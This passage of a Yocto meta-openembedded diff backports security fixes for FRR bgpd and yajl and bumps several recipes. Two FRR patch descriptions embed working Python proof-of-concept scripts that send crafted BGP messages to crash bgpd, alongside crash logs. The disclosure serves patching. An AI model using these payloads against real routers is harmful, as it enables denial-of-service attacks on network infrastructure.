+Subject: [PATCH] bgpd: Check mandatory attributes more carefully for UPDATE + message + +If we send a crafted BGP UPDATE message without mandatory attributes, we do +not check if the length of the path attributes is zero or not. We only check +if attr->flag is at least set or not. Imagine we send only unknown transit +attribute, then attr->flag is always 0. Also, this is true only if graceful-restart +capability is received. + +A crash: + +``` +bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16) +bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17 +BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting... +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d] +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593] +BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181] +BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980] +BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a] +BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290] +BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610] +BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5] +BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867] +BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6] +BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597] +BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3] +BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0] +BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979] +``` + +Sending: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(1000) +s.close() +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/d8482bf011cb2b173e85b65b4bf3d5061250cdb9] +CVE: CVE-2023-46753 +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_attr.c | 10 ++++++---- + 1 file changed, 6 insertions(+), 4 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index e7bb42a5d989..cf2dbe65b805 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3385,13 +3385,15 @@ bgp_attr_unknown(struct bgp_attr_parser_args *args) + } + + /* Well-known attribute check. */ +-static int bgp_attr_check(struct peer *peer, struct attr *attr) ++static int bgp_attr_check(struct peer *peer, struct attr *attr, ++ bgp_size_t length) + { + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an + * empty UPDATE. */ +- if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag) ++ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && ++ !length) + return BGP_ATTR_PARSE_PROCEED; + + /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +@@ -3443,7 +3445,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + enum bgp_attr_parse_ret ret; + uint8_t flag = 0; + uint8_t type = 0; +- bgp_size_t length; ++ bgp_size_t length = 0; + uint8_t *startp, *endp; + uint8_t *attr_endp; + uint8_t seen[BGP_ATTR_BITMAP_SIZE]; +@@ -3831,7 +3833,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + } + + /* Check all mandatory well-known attributes are present */ +- ret = bgp_attr_check(peer, attr); ++ ret = bgp_attr_check(peer, attr, length); + if (ret < 0) + goto done; + +-- +2.42.1 + diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch new file mode 100644 index 0000000000..754f9345a0 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch @@ -0,0 +1,95 @@ +From c37119df45bbf4ef713bc10475af2ee06e12f3bf Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Sun, 29 Oct 2023 22:44:45 +0200 +Subject: [PATCH] bgpd: Ignore handling NLRIs if we received MP_UNREACH_NLRI + +If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if +no mandatory path attributes received. + +In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled +as a new data, but without mandatory attributes, it's a malformed packet. + +In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST +handle that. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/c37119df45bbf4ef713bc10475af2ee06e12f3bf] +CVE: CVE-2023-47234 +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_attr.c | 19 ++++++++++--------- + bgpd/bgp_attr.h | 1 + + bgpd/bgp_packet.c | 7 ++++++- + 3 files changed, 17 insertions(+), 10 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 1473dc772502..75aa2ac7cce6 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3399,15 +3399,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + !length) + return BGP_ATTR_PARSE_WITHDRAW; + +- /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +- to carry any other path attributes.", though if MP_REACH_NLRI or NLRI +- are present, it should. Check for any other attribute being present +- instead. +- */ +- if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && +- CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))) +- return BGP_ATTR_PARSE_PROCEED; +- + if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) + type = BGP_ATTR_ORIGIN; + +@@ -3426,6 +3417,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF))) + type = BGP_ATTR_LOCAL_PREF; + ++ /* An UPDATE message that contains the MP_UNREACH_NLRI is not required ++ * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI ++ * are present, it should. Check for any other attribute being present ++ * instead. ++ */ ++ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && ++ CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))) ++ return type ? BGP_ATTR_PARSE_MISSING_MANDATORY ++ : BGP_ATTR_PARSE_PROCEED; ++ + /* If any of the well-known mandatory attributes are not present + * in an UPDATE message, then "treat-as-withdraw" MUST be used. + */ +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index fc347e7a1b4b..d30155e6dba0 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -364,6 +364,7 @@ enum bgp_attr_parse_ret { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, ++ BGP_ATTR_PARSE_MISSING_MANDATORY = -4, + }; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index a7514a26aa64..5dc35157ebf6 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -2359,7 +2359,12 @@ static int bgp_update_receive(struct peer_connection *connection, + /* Network Layer Reachability Information. */ + update_len = end - stream_pnt(s); + +- if (update_len && attribute_len) { ++ /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then ++ * NLRIs should be handled as a new data. Though, if we received ++ * NLRIs without mandatory attributes, they should be ignored. ++ */ ++ if (update_len && attribute_len && ++ attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) { + /* Set NLRI portion to structure. */ + nlris[NLRI_UPDATE].afi = AFI_IP; + nlris[NLRI_UPDATE].safi = SAFI_UNICAST; +-- +2.42.1 + diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch new file mode 100644 index 0000000000..b06ba94a34 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch @@ -0,0 +1,112 @@ +From 6814f2e0138a6ea5e1f83bdd9085d9a77999900b Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Fri, 27 Oct 2023 11:56:45 +0300 +Subject: [PATCH] bgpd: Treat EOR as withdrawn to avoid unwanted handling of + malformed attrs + +Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be +processed as a normal UPDATE without mandatory attributes, that could lead +to harmful behavior. In this case, a crash for route-maps with the configuration +such as: + +``` +router bgp 65001 + no bgp ebgp-requires-policy + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + ! + address-family ipv4 unicast + neighbor 127.0.0.1 addpath-tx-all-paths + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +exit +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Send a malformed optional transitive attribute: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(100) +s.close() +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/6814f2e0138a6ea5e1f83bdd9085d9a77999900b] +CVE: CVE-2023-47235 +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_attr.c | 15 ++++++++++++--- + 1 file changed, 12 insertions(+), 3 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index cf2dbe65b805..1473dc772502 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3391,10 +3391,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an +- * empty UPDATE. */ ++ * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it, ++ * we will pass it to be processed as a normal UPDATE without mandatory ++ * attributes, that could lead to harmful behavior. ++ */ + if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && + !length) +- return BGP_ATTR_PARSE_PROCEED; ++ return BGP_ATTR_PARSE_WITHDRAW; + + /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required + to carry any other path attributes.", though if MP_REACH_NLRI or NLRI +@@ -3889,7 +3892,13 @@ done: + aspath_unintern(&as4_path); + + transit = bgp_attr_get_transit(attr); +- if (ret != BGP_ATTR_PARSE_ERROR) { ++ /* If we received an UPDATE with mandatory attributes, then ++ * the unrecognized transitive optional attribute of that ++ * path MUST be passed. Otherwise, it's an error, and from ++ * security perspective it might be very harmful if we continue ++ * here with the unrecognized attributes. ++ */ ++ if (ret == BGP_ATTR_PARSE_PROCEED) { + /* Finally intern unknown attribute. */ + if (transit) + bgp_attr_set_transit(attr, transit_intern(transit)); +-- +2.42.1 + diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb b/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb index bddc08aebb..c447df0512 100644 --- a/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb +++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr_9.0.1.bb @@ -9,9 +9,15 @@ LICENSE = "GPL-2.0-only & LGPL-2.1-only" LIC_FILES_CHKSUM = "file://doc/licenses/GPL-2.0;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://doc/licenses/LGPL-2.1;md5=4fbd65380cdd255951079008b364516c" +PR = "r1" + SRC_URI = "git://github.com/FRRouting/frr.git;protocol=https;branch=stable/9.0 \ file://frr.pam \ file://0001-tools-make-quiet-actually-suppress-output.patch \ + file://CVE-2023-46752.patch \ + file://CVE-2023-46753.patch \ + file://CVE-2023-47235.patch \ + file://CVE-2023-47234.patch \ " SRCREV = "31ed3dd753d62b5d8916998bc32814007e91364b" diff --git a/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.3.bb b/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.6.bb index a5fc158749..3688ce4091 100644 --- a/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.3.bb +++ b/meta-openembedded/meta-networking/recipes-support/openvpn/openvpn_2.6.6.bb @@ -2,7 +2,7 @@ SUMMARY = "A full-featured SSL VPN solution via tun device." HOMEPAGE = "https://openvpn.net/" SECTION = "net" LICENSE = "GPL-2.0-only" -LIC_FILES_CHKSUM = "file://COPYING;md5=3170e982baae61dbb8de963317d1ac94" +LIC_FILES_CHKSUM = "file://COPYING;md5=d8d34ce6390552676e4ce8279f13c48a" DEPENDS = "lzo lz4 openssl iproute2 libcap-ng ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}" inherit autotools systemd update-rc.d pkgconfig @@ -14,7 +14,7 @@ SRC_URI = "http://swupdate.openvpn.org/community/releases/${BP}.tar.gz \ UPSTREAM_CHECK_URI = "https://openvpn.net/community-downloads" -SRC_URI[sha256sum] = "13b207a376d8880507c74ff78aabc3778a9da47c89f1e247dcee3c7237138ff6" +SRC_URI[sha256sum] = "3b074f392818b31aa529b84f76e8b5e4ad03fca764924f46d906bceaaf421034" CVE_STATUS[CVE-2020-27569] = "not-applicable-config: Applies only Aviatrix OpenVPN client, not openvpn" diff --git a/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.11.bb b/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.12.bb index fb1bea2d87..87d12bc6c8 100644 --- a/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.11.bb +++ b/meta-openembedded/meta-networking/recipes-support/strongswan/strongswan_5.9.12.bb @@ -11,7 +11,7 @@ DEPENDS:append = "${@bb.utils.contains('DISTRO_FEATURES', 'tpm2', ' tpm2-tss', SRC_URI = "https://download.strongswan.org/strongswan-${PV}.tar.bz2 \ " -SRC_URI[sha256sum] = "ddf53f1f26ad26979d5f55e8da95bd389552f5de3682e35593f9a70b2584ed2d" +SRC_URI[sha256sum] = "5e6018b07cbe9f72c044c129955a13be3e2f799ceb53f53a4459da6a922b95e5" UPSTREAM_CHECK_REGEX = "strongswan-(?P<pver>\d+(\.\d+)+)\.tar" diff --git a/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb b/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb index a5d614961a..8db456b99c 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/dnf-plugin-tui/dnf-plugin-tui_git.bb @@ -42,4 +42,6 @@ RDEPENDS:${PN} += " \ dnf \ libnewt-python \ " +BBCLASSEXTEND = "nativesdk" + SKIP_RECIPE[dnf-plugin-tui] ?= "${@bb.utils.contains('PACKAGE_CLASSES', 'package_rpm', '', 'does not build correctly without package_rpm in PACKAGE_CLASSES', d)}" diff --git a/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb b/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb index d30d9c3466..19ef987387 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/openocd/openocd_git.bb @@ -7,7 +7,7 @@ RDEPENDS:${PN} = "libusb1" SRC_URI = " \ git://repo.or.cz/openocd.git;protocol=http;name=openocd;branch=master \ git://repo.or.cz/r/git2cl.git;protocol=http;destsuffix=tools/git2cl;name=git2cl;branch=master \ - git://github.com/msteveb/jimtcl.git;protocol=http;destsuffix=git/jimtcl;name=jimtcl;branch=master \ + git://github.com/msteveb/jimtcl.git;protocol=https;destsuffix=git/jimtcl;name=jimtcl;branch=master \ git://repo.or.cz/r/libjaylink.git;protocol=http;destsuffix=git/src/jtag/drivers/libjaylink;name=libjaylink;branch=master \ " diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2017-16516.patch b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2017-16516.patch new file mode 100644 index 0000000000..1241ff9e31 --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2017-16516.patch @@ -0,0 +1,37 @@ +From 0b5e73c4321de0ba1d495fdc0967054b2a77931c Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Daniel=20P=2E=20Berrang=C3=A9?= <berrange@redhat.com> +Date: Mon, 10 Jul 2023 13:36:10 +0100 +Subject: [PATCH] Fix for CVE-2017-16516 +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Description: Fix for CVE-2017-16516 + Potential buffer overread: A JSON file can cause denial of service. +Origin: https://github.com/brianmario/yajl-ruby/commit/a8ca8f476655adaa187eedc60bdc770fff3c51ce + +CVE: CVE-2017-16516 +Upstream-Status: Submitted [https://github.com/lloyd/yajl/issues/248] +Signed-off-by: Ross Burton <ross.burton@arm.com> +--- + src/yajl_encode.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/src/yajl_encode.c b/src/yajl_encode.c +index fd08258..0d97cc5 100644 +--- a/src/yajl_encode.c ++++ b/src/yajl_encode.c +@@ -139,8 +139,8 @@ void yajl_string_decode(yajl_buf buf, const unsigned char * str, + end+=3; + /* check if this is a surrogate */ + if ((codepoint & 0xFC00) == 0xD800) { +- end++; +- if (str[end] == '\\' && str[end + 1] == 'u') { ++ if (end + 2 < len && str[end + 1] == '\\' && str[end + 2] == 'u') { ++ end++; + unsigned int surrogate = 0; + hexToDigit(&surrogate, str + end + 2); + codepoint = +-- +2.34.1 + diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2022-24795.patch b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2022-24795.patch new file mode 100644 index 0000000000..0dc859099d --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2022-24795.patch @@ -0,0 +1,59 @@ +From 17de4d15687aa30c49660dc4b792b1fb4d38b569 Mon Sep 17 00:00:00 2001 +From: =?UTF-8?q?Petr=20P=C3=ADsa=C5=99?= <ppisar@redhat.com> +Date: Thu, 7 Apr 2022 17:29:54 +0200 +Subject: [PATCH] Fix CVE-2022-24795 + +There was an integer overflow in yajl_buf_ensure_available() leading +to allocating less memory than requested. Then data were written past +the allocated heap buffer in yajl_buf_append(), the only caller of +yajl_buf_ensure_available(). Another result of the overflow was an +infinite loop without a return from yajl_buf_ensure_available(). + +yajl-ruby project, which bundles yajl, fixed it +<https://github.com/brianmario/yajl-ruby/pull/211> by checking for the +integer overflow, fortifying buffer allocations, and report the +failures to a caller. But then the caller yajl_buf_append() skips +a memory write if yajl_buf_ensure_available() failed leading to a data +corruption. + +A yajl fork mainter recommended calling memory allocation callbacks with +the large memory request and let them to handle it. But that has the +problem that it's not possible pass the overely large size to the +callbacks. + +This patch catches the integer overflow and terminates the process +with abort(). + +CVE: CVE-2022-24795 +Upstream-Status: Submitted [https://github.com/lloyd/yajl/issues/239] +Signed-off-by: Ross Burton <ross.burton@arm.com> +--- + src/yajl_buf.c | 12 +++++++++++- + 1 file changed, 11 insertions(+), 1 deletion(-) + +diff --git a/src/yajl_buf.c b/src/yajl_buf.c +index 1aeafde..55c11ad 100644 +--- a/src/yajl_buf.c ++++ b/src/yajl_buf.c +@@ -45,7 +45,17 @@ void yajl_buf_ensure_available(yajl_buf buf, size_t want) + + need = buf->len; + +- while (want >= (need - buf->used)) need <<= 1; ++ if (((buf->used > want) ? buf->used : want) > (size_t)(buf->used + want)) { ++ /* We cannot allocate more memory than SIZE_MAX. */ ++ abort(); ++ } ++ while (want >= (need - buf->used)) { ++ if (need >= (size_t)((size_t)(-1)<<1)>>1) { ++ /* need would overflow. */ ++ abort(); ++ } ++ need <<= 1; ++ } + + if (need != buf->len) { + buf->data = (unsigned char *) YA_REALLOC(buf->alloc, buf->data, need); +-- +2.34.1 + diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch new file mode 100644 index 0000000000..47454dc8af --- /dev/null +++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl/CVE-2023-33460.patch @@ -0,0 +1,35 @@ +Fix memory leaks. Taken from the Fedora packaging (https://src.fedoraproject.org/rpms/yajl) +where it was backported from openEuler. + +CVE: CVE-2023-33460 +Upstream-Status: Submitted [https://github.com/lloyd/yajl/issues/250] +Signed-off-by: Ross Burton <ross.burton@arm.com> + +diff --git a/src/yajl_tree.c b/src/yajl_tree.c +index 3d357a3..56c7012 100644 +--- a/src/yajl_tree.c ++++ b/src/yajl_tree.c +@@ -143,7 +143,7 @@ static yajl_val context_pop(context_t *ctx) + ctx->stack = stack->next; + + v = stack->value; +- ++ free (stack->key); + free (stack); + + return (v); +@@ -444,7 +444,14 @@ yajl_val yajl_tree_parse (const char *input, + snprintf(error_buffer, error_buffer_size, "%s", internal_err_str); + YA_FREE(&(handle->alloc), internal_err_str); + } ++ while(ctx.stack != NULL) { ++ yajl_val v = context_pop(&ctx); ++ yajl_tree_free(v); ++ } + yajl_free (handle); ++ //If the requested memory is not released in time, it will cause memory leakage ++ if(ctx.root) ++ yajl_tree_free(ctx.root); + return NULL; + } + diff --git a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb index cf8dbb183e..2a34210f3c 100644 --- a/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb +++ b/meta-openembedded/meta-oe/recipes-devtools/yajl/yajl_2.1.0.bb @@ -8,7 +8,11 @@ HOMEPAGE = "http://lloyd.github.com/yajl/" LICENSE = "ISC" LIC_FILES_CHKSUM = "file://COPYING;md5=39af6eb42999852bdd3ea00ad120a36d" -SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https" +SRC_URI = "git://github.com/lloyd/yajl;branch=master;protocol=https \ + file://CVE-2017-16516.patch \ + file://CVE-2022-24795.patch \ + file://CVE-2023-33460.patch \ + " SRCREV = "a0ecdde0c042b9256170f2f8890dd9451a4240aa" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb b/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb index 95cb29775a..0382e6bdfe 100644 --- a/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb +++ b/meta-openembedded/meta-oe/recipes-navigation/geos/geos_3.12.0.bb @@ -13,7 +13,7 @@ inherit cmake pkgconfig binconfig PACKAGES =+ "geoslib ${PN}-c1" DESCRIPTION:${PN}lib = "Geometry engine for Geographic Information Systems - C++ Library" -FILES:${PN}lib += "${libdir}/libgeos-${PV}.so" +FILES:${PN}lib += "${libdir}/libgeos.so.*" DESCRIPTION:${PN}-c1 = "Geometry engine for Geographic Information Systems - C Library" FILES:${PN}-c1 += "${libdir}/libgeos_c.so.*" diff --git a/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb b/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb index 68b91c0b0c..e716430673 100644 --- a/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb +++ b/meta-openembedded/meta-oe/recipes-support/hdf5/hdf5_1.14.2.bb @@ -7,7 +7,7 @@ SECTION = "libs" LICENSE = "HDF5" LIC_FILES_CHKSUM = "file://COPYING;md5=9ba0f3d878ab6c2403c86e9b0362d998" -inherit cmake siteinfo qemu multilib_header +inherit cmake siteinfo qemu multilib_header multilib_script DEPENDS += "qemu-native zlib" @@ -40,6 +40,10 @@ EOF do_unpack[postfuncs] += "gen_emu" +MULTILIB_SCRIPTS += "${PN}:${bindir}/h5cc \ + ${PN}:${bindir}/h5hlcc \ +" + do_install:append() { # Used for generating config files on target install -m 755 ${B}/bin/H5detect ${D}${bindir} diff --git a/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.370.bb b/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.375.bb index 56d4253772..b834069733 100644 --- a/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.370.bb +++ b/meta-openembedded/meta-oe/recipes-support/hwdata/hwdata_0.375.bb @@ -5,7 +5,7 @@ SECTION = "System/Base" LICENSE = "GPL-2.0-or-later | XFree86-1.0" LIC_FILES_CHKSUM = "file://LICENSE;md5=1556547711e8246992b999edd9445a57" -SRCREV = "21cb47beb1716545b25dfe8ae1b9e079c73b85d9" +SRCREV = "b9ba5bc9eecbeeff441806695b227c3c3de4755c" SRC_URI = "git://github.com/vcrhonek/${BPN}.git;branch=master;protocol=https" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb b/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb index 926a603b81..28e40f66e3 100644 --- a/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb +++ b/meta-openembedded/meta-oe/recipes-support/libbytesize/libbytesize_2.10.bb @@ -10,7 +10,7 @@ S = "${WORKDIR}/git" B = "${S}" SRCREV = "6e83cc6f6dff4f126fc79284e0c3c1c50123380d" -SRC_URI = "git://github.com/rhinstaller/libbytesize;branch=main;protocol=https" +SRC_URI = "git://github.com/storaged-project/libbytesize;branch=main;protocol=https" inherit gettext autotools pkgconfig python3native diff --git a/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb b/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb index ae4b3b9bf6..a7a9019e33 100644 --- a/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb +++ b/meta-openembedded/meta-oe/recipes-support/multipath-tools/multipath-tools_0.9.3.bb @@ -29,7 +29,7 @@ DEPENDS = "libdevmapper \ LICENSE = "GPL-2.0-only" -SRC_URI = 